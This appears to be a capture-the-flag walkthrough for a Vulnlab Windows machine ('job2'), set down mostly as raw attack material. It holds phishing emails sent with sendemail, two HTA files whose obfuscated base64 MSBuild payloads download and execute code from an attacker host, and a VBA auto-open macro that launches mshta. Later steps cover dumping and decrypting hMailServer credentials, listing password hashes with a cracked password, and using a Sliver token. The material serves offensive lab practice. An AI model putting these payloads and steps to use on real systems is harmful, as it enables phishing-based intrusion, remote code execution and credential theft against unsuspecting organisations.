10.10.117.55
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH for_Windows_8.1 |
| 25 | smtp | hMailServer smtpd |
| 80 | http | Microsoft HTTPAPI httpd 2.0 |
| 111 | rpcbind | |
| 135 | msrpc | Microsoft Windows RPC |
| 139 | netbios-ssn | Microsoft Windows netbios-ssn |
| 443 | ssl/http | Microsoft HTTPAPI httpd 2.0 DNS:job2.vl, DNS:www.job2.vl |
| 445 | microsoft-ds? | |
| 1063 | rpcbind | |
| 2049 | rpcbind | |
| 3389 | ms-wbt-server | Microsoft Terminal Services - rdp-ntlm-info: - 3: 1:1: - DNS_Domain_Name: JOB2 - DNS_Computer_Name: JOB2 - date: 2024-06-18T15:42:10 - smb2-time: - Product_Version: 10.0.20348 - Target_Name: JOB2 - ssl-cert: Subject: commonName=JOB2 - NetBIOS_Computer_Name: JOB2 - NetBIOS_Domain_Name: JOB2 - Not valid before: 2024-06-17T15:41:01 - smb2-security-mode: |
sendemail -s job2.vl -f "sec <sec@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.41/" -a job2.docm
sliver64.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjguMi40MS9hbXNpNjQudHh0JykgfCBpZXgiOwogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOwogICAgICAgICAgICBycy5PcGVuKCk7CiAgICAgICAgICAgIFBvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOwogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOwogICAgICAgICAgICBwcy5BZGRTY3JpcHQoY21kKTsKICAgICAgICAgICAgcHMuSW52b2tlKCk7CiAgICAgICAgICAgIHJzLkNsb3NlKCk7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwoKCiAgICAgICAgICAgICAgICB9CgoKICAgICAgICAgICAgfQoKCgoKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogIDwvVXNpbmdUYXNrPgo8L1Byb2plY3Q+Cg== > c:\\windows\\temp\\enc6.txt;certutil -decode c:\\windows\\temp\\enc6.txt c:\\windows\\temp\\g.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\g.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
sliver86.hta
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjguMi40MS9hbXNpODYudHh0JykgfCBpZXgiOwogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOwogICAgICAgICAgICBycy5PcGVuKCk7CiAgICAgICAgICAgIFBvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOwogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOwogICAgICAgICAgICBwcy5BZGRTY3JpcHQoY21kKTsKICAgICAgICAgICAgcHMuSW52b2tlKCk7CiAgICAgICAgICAgIHJzLkNsb3NlKCk7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwoKCiAgICAgICAgICAgICAgICB9CgoKICAgICAgICAgICAgfQoKCgoKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogIDwvVXNpbmdUYXNrPgo8L1Byb2plY3Q+Cg== > c:\\windows\\temp\\enc7.txt;certutil -decode c:\\windows\\temp\\enc7.txt c:\\windows\\temp\\h.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\h.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
VBA macro
Sub MyMacro()
Dim str2 As String
str2 = "mshta.exe http://10.8.2.41/sliver.hta"
Shell str2, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
sendemail -s job2.vl -f "sec <sec@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.41/" -a test2.dotm
Creds.txt found on desktop of Julian
Mailserver Administrator: MailAdm1n2023
hmailserver
download "C:\Program Files (x86)\hMailServer\Database\hMailserver.sdf"
download "C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI"
hmailserver.ini file
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
.\hmailserver_password.exe dec 4e9989caf04eaa5ef87fd1f853f08b62
95C02068FD5D
On windows
| usernaem | password hash |
|---|---|
| Julian@job2.vl | 8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f |
| Ferdinand@job2.vl | 04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11 |
| hr@job2.vl | 1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055 |
| crackerd user | password |
|---|---|
| Ferdinand@job2.vl | Franzi123! |
Sliver Make-token
make-token -d job2.vl -u Ferdinand -p Franzi123! -T LOGON_NETWORK
VL{ce3867020404ba034cff2a083b79665f}
VeeamHax
VL{62ef35ebdc30b7e9c78d5a4d99f282b7}